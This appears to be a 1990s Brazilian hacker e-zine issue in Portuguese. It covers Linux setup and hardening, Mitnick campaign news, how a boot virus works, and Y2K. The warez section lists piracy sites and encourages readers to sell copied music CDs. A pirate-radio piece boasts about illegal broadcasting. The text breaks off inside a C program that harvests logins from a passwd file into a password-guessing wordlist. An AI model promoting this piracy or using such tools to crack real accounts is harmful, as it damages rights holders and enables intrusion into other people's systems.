zZZZZZZZZZZZZZZZZZZz zZ zZ cCCCCc sSSSSs zZ ii n NN eEEEe cCC CCc sSS SSs zZ II Nn NN eEE EEe cCC CC sSS SS zZ NNn NN eEE EE cCCC CC SSSs S zZ ii NNNn NN eEEE E CCCC C SSSs zZ II NNNNn NN EEEE CCCC SSSs zZ II NN NNn NN EEEEEEEe CCCC SSSs zZ II NN NNn NN EEEEEEEe CCCC c SSSs zZ II NN NNn NN EEEE CCCC cC s SSSs zZ II NN NNnNN EEEE e CCC CC Ss sSS zZ II NN NNNN EEe eE CCc cCC SSs sSS zZ II NN NNN EEe eEE CCCCCC SSSSSS zZ II NN NN EEEEE zZ zZ zZZZZZZZZZZZZZZZZZZz Numbah 24 ~~~~~~ ~~ јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј * E-Mail da revista : cszine@hotmail.com * Memoserv de Struck : /msg memoserv send Struck (Soh no irc.via-rs.com.br) * Page da revista : http://members.xoom.com/cszine јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј InTrOdUcIoN.. A pedido de um amigo meu, que logo se tornara' editor da zine, eu vou parar um pouco de colocar tanto sobre o Kevin m. . Concordo que jah enjoou. A seчao sera' dedicada a historis de outros hackers, tanto brasileros quanto extrangeiros. Se voce tiver a historia ai, mande para mim que eu a publicarei aqui.. Tipo.. pra proxima edicao eu jah preparei uma historia na- cional, mas depois eu nao tenho mais nada. Como eu nao consigo viver na chatice e monoteice, mudei novamente os graficos ascii da zine. Nao mudei o logon porque nao me surgiu ideias, mas na proxima edicao estara' bala. јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј "Informacao nao e crime...crime e usa-la como um lamer..." Oluparun јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј ss. .ss ss. .ss ss. .ss ss. .ss sSS SSs sSS SSs sSS SSs sSS SSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSss SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $ $ $ $ $$$ $ $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$ $$$$$$$$ $$ $ $$ $ $$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$ $$$ $$$ $ $ $ $ $$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$ $$ $$$$ $ $$ $ $$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $ $ $ $ $$$ $ $$$ SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSS SSS SSS SSS SSS SSS SSS SSS S S S S S S S S јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј Indice: Secao: Assunto: Autor: 1. Linux Configurando seu Linux Cheat Struck 2. Kevin Mitnick NOTICIAS DE MITNICK Fernanda S. 3. Warez Pirataria Eletronica Cheat Struck 4. VIRII Virus de Boot Cheat Struck 5. Bugz Bug do milenio Cheat Struck 6. Programaчao Alguns progs interessantes Cheat Struck 7. Win Attack NetBus ZeFuReNgA 8. Invasao de privacidade Hackeando a XOOM Cheat Struck 9. Hack, the Art Moore Tips Hackz Cheat Struck 10. ЁЁЁBoNuS!!! Truques com cartas Cheat Struck јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј Quem escreveu nessa edicao??? Cheat Struck Fernanda Serpa ZeFuReNgA јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј ss. .ss ss. .ss ss. .ss ss. .ss sSS SSs sSS SSs sSS SSs sSS SSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSss SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$ $ $ $ $ $$$ $ $$$$$$$ $$$$$$ $$$$$$$$$$$$$$$$$$$$$$$ $$$$$ $$$$$$$$ $$ $ $$ $ $$$$$$$$$$ $$$$$ 1. Linux $$$$$$$$$$$$$$$$$$$$$$$ $$$$$ $$$ $$$ $ $ $ $ $$$$$ $$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$ $$ $$$$ $ $$ $ $$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$ $ $ $ $ $$$ $ $$$ SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSS SSS SSS SSS SSS SSS SSS SSS S S S S S S S S јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј Configurando seu Linux. Pois eh.. Conheci muitas pessoas que jah instalaram o linux mas nao sabem con- figura-lo e nem usa-lo para conectar a internet. Pois eh. Essa materia e' em homenagem a voce que me enviou o email pedindo que abrisse essa secao. Se tiver mais uma duvida mande outro email q eu colocarei a resposta aqui okz.. ***** Inicializaчao ********************************************************* Durante a instalacao do linux ele perguntara onde sera' dado o LILO BOOT. Se voce estiver usando dois sistemas operacionais no computador eu re- comendo fazer com que o LILO BOOT seja feito em um disquete. Insira entao um disquete, e nomeie-o como LILO BOOT. Inicie o computador com o disquete no drive. Apos a msg "LILO BOOT:", tecle TAB para ver as alternativas. Entao digite o nome que foi dado a parti- cao do Linux. O default do RH e' "dos" pro windows e "linux" pro linux. No SlackWare nao tenho certeza mas acho que e' "win" pro windows e "linux" pro linux. A primeira inicializaчao pode demorar um pouco. Agora na entrada di- gite seu login e senha. Se voce nao se lembrar da senha colocada durante a instalacao. De reset e no "LILO BOOT:" digite "linux single". Quando voce decidir parar de usar nao de apenas um reset. Digite : "reboot" (tem que ser o root). O linux se preparara' para rebootar. Assim na proxima inicializaчao ele nao levara tanto tempo. O meu entra em uns 10 seg. ***** Configurando acesso a internet **************************************** Voce vai precisar configurar varios arquivos para ter uma conexao segura com seu provedor. Uma configuracao simples seria assim: Edite o arquivo /etc/resolv.conf e adicione as seguintes linhas: domain YYYYYYYY nameserver XXX.XXX.XXX.XXX Onde YYYYYYYY e' o dominio do provedor(tipo.. aquilo que vem depois do host que e' te dado). XXX.XXX.XXX.XXX e' o IP do DNS do provedor. Ae voce entra no minicom com o comando 'minicom'. Use os comandos do modem para discar(ex: ATDP 0001122). Apos a conexao digite o username e a sua senha. Tecle Ctrl+A segure por uns 7 segundos(no comeco e' foda, depois voce se acostuma), solte e tecle Z. Voce vai para um menu de opcoes. Tecle Q para sair e confirme. De volta ao prompt, digite: pppd /dev/modem 38400 defaultroute Prontu!! Voce estah conectado. ***** Configurando uma conexao segura *************************************** Na instalacao do linux jah vem configurado alguns servicos para serem usados em redes. Nao me lembro ao certo quais sao. Acho que dentre eles estao Telnet, FTP, SMTP, POP3, FINGER, NETSTAT, e outros... Meu conselho e' reirar todos a nao ser que voce queira que um outro usuario use uma shell no seu sistema. Nao deixe qquer um entrar no seu siste- ma, pois se um bug ou uma permisao de um arquivo estiver errada possibilitan- do o usuario pegar contas e/ou root-shell. Se for seu amigo lhe avisara' dos problemas, se nao for.. Vamos ver como fazer isso entao... * Desabilitando serviчos: - Edite o arquivo /etc/inetd.conf - Procure pelas linhas que nao comecam com um # - Essas linhas sao os servicos abilitados - Para desabilitar basta colocar um # na frente da linha * Definir usuarios que podem usar seu sistema: - Edite o arquivo /etc/hosts.denny - Insira a linha "all: all" - Se quizer fazer com que os usuarios nao tenham acesso somente a telnet, insira a linha desse modo: "in.telnetd: all". E assim vale para todos os serviчos. - Agora voce deve dar acesso um a um. - Primeiro descubra o IP do kra. - Entao edite o /etc/hosts.allow e insira a seguinte linha: all: XXX.XXX.XXX.XXX Onde XXX.XXX.XXX.XXX e' o IP do usuario. - Se quizer tipo abilitar somente o ftp insira a linha assim: in.ftpd: XXX.XXX.XXX.XXX ***** Configurando inicializaчoes ******************************************* Ao adicionar um usuario com o 'adduser' ele criara' um diretorio home (/home/nome_do_user) onde conterao varios arquivos ocultos. Os arquivos ocultos tem um .(ponto) na frente para nao serem detecta- dos pelo ls. Porem atualmente os usuarios de Linux nao usam muito o ls sem nenhum subcomando. O mais usado e' ls -la onde listara os arquivos e pastas (tanto simples quanto ocultos) com suas propriedades. Voltando aos arquivos criados pelo 'adduser'.. O arquivo .bash_history loga todos os comandos da ultima secao do usuario. Este e' criado pelo proprio usuario que pode simplesmente altera-lo. O arquivo .bash_profile sao um conjunto de comandos para serem execu- tados na entrada do usuario. Voce sendo o root pode usa-lo para mandar msgs para o usuario. Tipo.. colocar assim como conteudo: echo "hehehehe!!" echo "Voce nao fez por merecer essa shell." echo "Good Bye" exit No arquivo .bash_logout coloque os comandos a serem executados quando o usuario sair. Aqui eu soh falei dos arquivos para a shell bash por que e' a mais usada por usuarios tanto comuns como root's. ***************************************************************************** E' soh isso por hoje. Se alguma duvida ainda nao foi esclarecida mande emails com as per- guntas que eu to pensando em fazer isso em forma de FAQ para ficar mais facil o entendimento da materia. јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј ss. .ss ss. .ss ss. .ss ss. .ss sSS SSs sSS SSs sSS SSs sSS SSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSss SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS $$$$$$$ $$$$$$$$$$$$$$$ $ $ $ $ $$$ $ $$$$$$$ $$$$$$ $$$$$$$$$$$$$$$ $$$$$ $$$$$$$$ $$ $ $$ $ $$$$$$$$$$ $$$$$ 2. Kevin Mitnick $$$$$$$$$$$$$$$ $$$$$ $$$ $$$ $ $ $ $ $$$$$ $$$$$$ $$$$$$$$$$$$$$$$$ $$$$$$$$$ $$ $$$$ $ $$ $ $$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$$$$$$ $ $ $ $ $$$ $ $$$ SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSS SSS SSS SSS SSS SSS SSS SSS S S S S S S S S јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј NOTICIAS DO MITNICK (por Fernanda Serpa) 10/1996 Support Kevin - Aproxima-se o dia do julgamento de Kevin Mitnick. As 25 novas acusacoes que pesam sobre Kevin poderao cair por terra ou nao, dia 29 de janeiro de l997. As ultimas informacoes sao de que Kevin esta estressado e desmotivado em virtude de mil retaliacoes que tem sofrido(ate'o banho diario foi cortado- so'de 3 em 3 dias ocasionando problemas dermatologicos e de efeito moral arrasador, e'claro).Mas... no's nao podemos deixar que continuem violando os direitos humanos e legais de Kevin Mitnick. Nao e'possivel que fiquemos quietos diante de tanto barulho assistindo a este julgamento injusto e imoral. Agora e'o momento de "entupir"o correio americano de milhares de cartas para M. Janet Reno. Acesse o site www.netmarket.com.br/mitnick e participe da campanha. Envie quantas cartas puder e quiser. E'necessario que o Governo Americano entenda que o mundo todo esta assistindo a este julgamento e que nos nao vamos ficar de bracos cruzados esperando para ver quantos Kevin existirao depois deste Kevin. A campanha continua ate Kevin Mitnick ser posto em liber- dade. AJUDE KEVIN! 11/1996 Kevin foi para o confinamento solitario a uma da tarde de ontem sexta feira, dia 27. Ele estava na biblioteca estudando sua defesa quando o levaram para a solitaria dizendo que ele nao podia estar ali, etc... Bobagem. Na verdade o que eles queriam era um pretexto para entrar na cela de Kevin e roubar-lhe todos os seus pertences para poderem avaliar sua linha de defesa e tambem para coagir-lhe novamente com a solitaria a abrir mao de seus direitos legais. Isto e' um verdadeiro absurdo. Estou fazendo o que posso, contatando com algumas pessoas nos E.U.A para abrirem a boca no trombone junto a midia e fazer pressao oficial. Por favor ajude divulgando a noticia para que estoure na midia o mais depressa possivel. јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј ss. .ss ss. .ss ss. .ss ss. .ss sSS SSs sSS SSs sSS SSs sSS SSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSss SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$ $ $ $ $ $$$ $ $$$$$$$ $$$$$$ $$$$$$$$$$$$$$$$$$$$$$$ $$$$$ $$$$$$$$ $$ $ $$ $ $$$$$$$$$$ $$$$$ 3. Warez $$$$$$$$$$$$$$$$$$$$$$$ $$$$$ $$$ $$$ $ $ $ $ $$$$$ $$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$ $$ $$$$ $ $$ $ $$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$ $ $ $ $ $$$ $ $$$ SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSS SSS SSS SSS SSS SSS SSS SSS S S S S S S S S јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј Pirataria Eletronica.. A pirataria em computadores tambem e' chamada de Warez no sub-mundo. Eu nao me interesso muito nisso, porem existem muitas pessoas que passam o dia intiero colados nos canais #warez trocando programas. Na maioria das vezes os programas valem a pena. Tenho que deixar claro que esta materia e' um resumo de varios dados encontrados na internet. "Niguem pode deter o impulso humano de desafiar o proibido... Tanto assim que o lema que orbita no espaco Warez e': Se um homem faz, o outro desfaz. Nao Existe impossivel." јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј CLINTON ASSINA PROJETO CONTRA PIRATARIA Bill Clinton assinou no dia 21/12 um projeto de lei que torna contra- vencao a pirataria de materiais com termo de copyright na Internet. Os proje- tos impoe penas de 1 a 3 anos de prisao e multas de ate 250 mil dolares a qualquer pessoa condenada por copiar materiais via Internet assinados com direito de propriedade intelectual na Internet, como software, gravacoes, textos e filmagens. O projeto e rejeitado pelas comunidades academicas e cientificas, que utilizam o livre fluxo de informacoes da Internet. Agora, o "No Electronic Theft Act" sera encaminhado ao Congresso dos EUA, que podera ou nao ratificar a lei. јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј Nomeclaturas * Traders: sao os caras que trocam os programas a maioria das vezes pelo ICQ ou pelo IRC. Vc pode dar uma olhada em canais como: #warez, #warezwarez, #freewarez, entre outros. * Coders: Sao os caras que manjam de programacao e estao sempre apoiando a galera do grupo. * Crackers: Sao os encarregados de quebrar a proteчao dos programas. Eles desenvolvem sistemas para tirar travas, passwords, estes programas sao cha- mados de Crackers, e podem ser encontrados em varias paginas Hackers decentes como a a zine Axur05: "http://www.axur05.org" * Supplier: O cara que fornece os programas para serem craqueados. јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј CD-R CD's Recordables(Gravaveis) sao a principal forma de transporte de Warez. Porem com um Gravador de CD e' possivel ganhar um dinheiro ateh de quem nem tem computador. Gravando CDs de musica vc pode ganhar um bom dinheiro com seus amigos Tipo o Corel CD Creator. Depois, escolha Audio CD, Velocidade 1x, e escolha as faixas q quer gravar (pode ser de qualquer CD de audio ou arquivos .WAV). Bleza. Voce pode ganhar R$10 por CD's. Tipo.. Nas lojas de musica um CD sai uns R$15,00 e um CD-R que sai uns R$5,00 (Na Globo). E voce ainda tera' a posibilidade de selecionar as musicas. јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј Lista de sites Warez [P A S T] - http://pages.infinit.net/obsidian/index.htm Dead End FTPZ - http://home.thezone.net/~cgriffit Warez Ftp - http://www.warezftp.org/ (C)Warez - http://hem2.passagen.se/resto/cwarez Elite Verified Sitez - http://209.75.36.214/ DaBoY's Warez - http://home.att.net/~xxdaboyxx Warez Universe - http://www.pbtech.com/~warezuni/ Warez pathfinder - http://www.multimedia-edv.com/iis/warez.htm WFA T3 WAREZ DIRECT - http://www.bright.net/~brandonr WareZ GameZ DownloadZ - http://www4.torget.se/users/p/Pudeln/warez/warez.htm јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј Radio pirata (por Anderson ( Pirata & Corsсrio ) ) Um Transmissor de FM profissional щ dividido em vсrias partes, cada item abaixo sуo circuitos que devem ser montados em compartimentos diferentes (caixas metсlicas), para que a blindagem seja feita corretamente para o per- feito funcionamento e mсximo rendimento do transmissor. * Oscilador / Modulador * Exitador de RF * Mѓdulo Amplificador Intermщdiario de RF * Mѓdulo Amplificador Final de RF * Medidor de Potъncia e Ondas Estacionсrias * Fonte de Alimentaчуo do Oscilador * Fonte de Alimentaчуo do Exitador, Amplificador Intermщdiario e Ampificador Final de RF Atenчуo !!! Esse equipamento exige do Tщcnico responsсvel pela montagem o minimo conhecimento da сrea de RF. Pois trata-se de um circuito extremamete complexo com muitas bobinas, placas e soldagens crэticas. Esse transmissor foi todo desenvolvido por mim ao longo dos meus estudos nessa сrea. Щ bom que o monta- dor saэba que esse tipo de transmissуo щ crime e pode dar atщ cadeia . Jс passei por um sufoco desse e mesmo assim continuio transmitindo pois tenho sangue de Pirata nas veias !!! јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј ss. .ss ss. .ss ss. .ss ss. .ss sSS SSs sSS SSs sSS SSs sSS SSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSss SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$ $ $ $ $ $$$ $ $$$$$$$ $$$$$$ $$$$$$$$$$$$$$$$$$$$$$$ $$$$$ $$$$$$$$ $$ $ $$ $ $$$$$$$$$$ $$$$$ 4. VIRII $$$$$$$$$$$$$$$$$$$$$$$ $$$$$ $$$ $$$ $ $ $ $ $$$$$ $$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$ $$ $$$$ $ $$ $ $$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$ $ $ $ $ $$$ $ $$$ SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSS SSS SSS SSS SSS SSS SSS SSS S S S S S S S S јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј Virus de BOOT Estou pra divulgar isso faz tempo(umas 2 edicoes). Soh que ae o Simon Phoenix entro naquelas de ser editor de outra secao e nao deu pra divulgar isso. Bem... nas proximas edicoes ele disse que mandaria mais coisas sobre virus. Esperamos que sim neh. Na ediчao 22 eu publiquei um Anti-Virus para o Leandro&Kelly, mas nao deu tempo pra falar como funciona o virus. Eu vou descrever aqui um breve historico dele e depois mostrar como ele se armazena na memoria. ***************************************************************************** * Historico do virus Leandro&Kelly * * * * Origem : Minas Gerais * * Autor : Governador Valadares * * Captado : 05/10/94 * * Encontrado : Boot de um Disco flexivel * * Local : PAULЭNIA - SP (Empresa Comercial) * * * * Surgiu pela primeira vez, em outubro de 1994, causando grande panico* * nacional. * * Foi distribuido largamente em um disco original(ou seria pirata?) de* * uma conceituada empresa multi-nacional. O virus alastrou-se de forma relam* * pago. * * Mesmo nao sendo um virus nocivo, ele pode ser fatal se combinado com* * outro virus, o que pode acarretar a danificaчao de Setor BOOT MASTER do * * disco rigido e a impossibilidade de acessa-lo. * * * ***************************************************************************** Compreenda os passos do seu computador ate' chegar no prompt... ~~~~~~~~~~ ~~ ~~~~~~ ~~ ~~~ ~~~~~~~~~~ ~~~~ ~~~~~~ ~~ ~~~~~~~~~ 1. O microprocessador executa o programa existente no endereчo FFFF:0000, onde existe o programa CHIP BIOS (Fisico). 2. O programa do BIOS apos os "checkups" costumeiros, vai ler e executar o conteudo no BOOT de disquete. 3. O conteudo do BOOT do disquete (programa de BOOT) e' um programa de inici- alizaчao e um bloco de parametros contendo Trilha, Setor por trilha, clus- ter, etc.. Nesta parte e' que o virus vai entrar, substituindo este programa. 4. Sem virus: O programa do BOOT chamara os arquivos de sistema (IO.SYS,etc). Com virus: O virus vai chamar o conteudo original(O programa de BOOT). O programa de Boot chamado pelo virus vai chamar os arquivos de Sis- tema (IO.SYS, etc). No caso de disco rigido, primeiro o BIOS chamara o BOOT MASTER que logo apos vai ler e largar o controle para o BOOT do DOS. Caso o virus entre no disco rigido, vai entao alocar no BOOT MASTER. Agora entenda como ele se organiza na memoria... ~~~~~ ~~~~~~~ ~~~~ ~~~ ~~ ~~~~~~~~ ~~ ~~~~~~~~~~ 0000:7C00 - Primeira parte do virus. Lido pela BIOS automaticamente. 0000:7E00 - Segunda parte do virus. Lido pelo virus durante a execucao como OVERLAY da trilha 27h Setor 9. Em determinada parte(primeira do virus) ele se auto copia no topo da memoria basica, normalmente em 9F00:0000, ficando: 9F00:01FF - Primeira parte 9F00:0200 - Segunda parte Apos copiar, ele salta para ele mesmo (seu clone), porem em outra area na memoria, de 0000:7C7D para 9F00:007E. Agora saiba como esta o Disco Contaminado... ~~~~~ ~~~~~ ~~~~ ~~~~ ~ ~~~~~ ~~~~~~~~~~~~~~ Trilha 0, Setor 1, Lado 0 = Primeira Parte do virus. E' onde deveria estar o boot. Saiba que a BIOS chamara' isto quando vc ligar o computador com o disco no drive, pensando encontrar o BOOT. Trilha 27, Setor 8, Lado 1 = Segunda parte do virus. Trilha 27, Setor 9, Lado 1 = Boot Original que deveria estar na Trilha 0, Se- tor 1, Lado 0. "Um virus ferido e' perigoso como um animal ferido......." FABIAN GRAZIA (Presidente do G.I.S.V.I) јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј ss. .ss ss. .ss ss. .ss ss. .ss sSS SSs sSS SSs sSS SSs sSS SSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSss SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$ $ $ $ $ $$$ $ $$$$$$$ $$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$ $$$$$ $$$$$$$$ $$ $ $$ $ $$$$$$$$$$ $$$$$ 5. Bugz $$$$$$$$$$$$$$$$$$$$$$$$ $$$$$ $$$ $$$ $ $ $ $ $$$$$ $$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$ $$ $$$$ $ $$ $ $$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$ $ $ $ $ $$$ $ $$$ SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSS SSS SSS SSS SSS SSS SSS SSS S S S S S S S S јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј Bug do milenio Provavelmente este seja o bug que mais ficara' conhecido na historia. Esse bug se encontra na BIOS de processadores antigos. O bug consiste no seguinte... As datas nas BIOS mais antigas eram mostradas assim: 12/04/98 Somente eram usados 2 caracteres para dia, mes e ano. Isso porque nos computadores antigos 4 caracteres ocupavam um significante espaco. Porem quando fizeram isso, nao haviam pensado no seguinte: Assim que chegassemos no ano 2000 o ano seria confundido com 1900 por os dois possuir os 2 ultimos caracteres iguais. E assim vai seguir: 2001 = 1901, 2002 = 1902,.. A pouco tempo ainda, veio um panaquinha ai que fez um programinha que somava algumas datas e dizia que havia descobreto o patch desse bug. Atualmente, e' soh assim que pode ser o patch, porem assim que chegar em 2100 aconteceria a mesma merda. O unico meio de concertar permamente esse bug e' atualizando o BIOS. Para voce verificar se seu BIOS possui este bug. Faчa o seginte... 1. Reinicie o computador e assim que comeчar o checkup de memoria tecle DEL. 2. Voce esta no Setup do BIOS. Entre no menu Standard CMOS Setup. 3. Verifique os caracteres do ano. Se possuir 4 carcteres, o BIOS esta inume a esse bug, se tiver soh 2... Se tiver 2 e voce nao quizer trocar o BIOS, va em.. http://www.rightime.com http://www.nstl.com/html/ymark-2000.html ..e pegue os patches. јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј ss. .ss ss. .ss ss. .ss ss. .ss sSS SSs sSS SSs sSS SSs sSS SSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSss SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS $$$$$$$ $$$$$$$$$$$$$$$$$ $ $ $ $ $$$ $ $$$$$$$ $$$$$$ $$$$$$$$$$$$$$$$$ $$$$$ $$$$$$$$ $$ $ $$ $ $$$$$$$$$$ $$$$$ 6. Programaчao $$$$$$$$$$$$$$$$$ $$$$$ $$$ $$$ $ $ $ $ $$$$$ $$$$$$ $$$$$$$$$$$$$$$$$$$ $$$$$$$$$ $$ $$$$ $ $$ $ $$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$$$$$$$$ $ $ $ $ $$$ $ $$$ SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSS SSS SSS SSS SSS SSS SSS SSS S S S S S S S S јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј Alguns programas interesantes Para a proxima edicao esta previsto um tutorial de C que um friend meu vai escrever. Enquanto nao chega aqui vai um programa nacional escrito por SkyLaz. Esse programa le um arquivo de senhas e pega todos os logins colocan- do-os em lista para ser usado como wordlist. E' muito util, pois muitos usua- rios usam o proprio login como senha. Basta executa-lo que ele dara' a sintaxe de uso. Foi mau, mas eu nao consegui o nome do arquivo. ----------------------------Corte Aki--(XXXXXXX.c)--------------------------- /* Pessoal, como esse prog. ainda esta na versao 1.0, ele possue algumas falhazinhas... Uma delas e que quando voce seleciona um arquivo passwd no qual suas linhas de senhas sejam maiores que 70-90 caracteres, ou seja, que oculpe mais de uma linha, ele vai interpretar como mais um login... Em breve lancarei a versao 2.0 com essas falhas ja arrumadas :] ehehe e de graca :] fcerqueira@hotmail.com */ #include main(int argc, char *argv[2]) { FILE *fp; int i; int count=0; char letter[128]; if (argc == 1) { printf("\033[1;40;34mProgramado by \033[1;40;32mSkyLaZ\033[1;40;33marT(h)"); printf("\t\t\033[1;40;37m#Hacking CoMpOtEnTe\n"); printf("\033[5;40;36mVersion: 1.0\n"); printf("\033[0;40;37m"); printf("\033[1;40;35mSintaxe: %s >> \n",argv[0]); printf("\n"); printf("\033[1;40;31mOBS: Nao 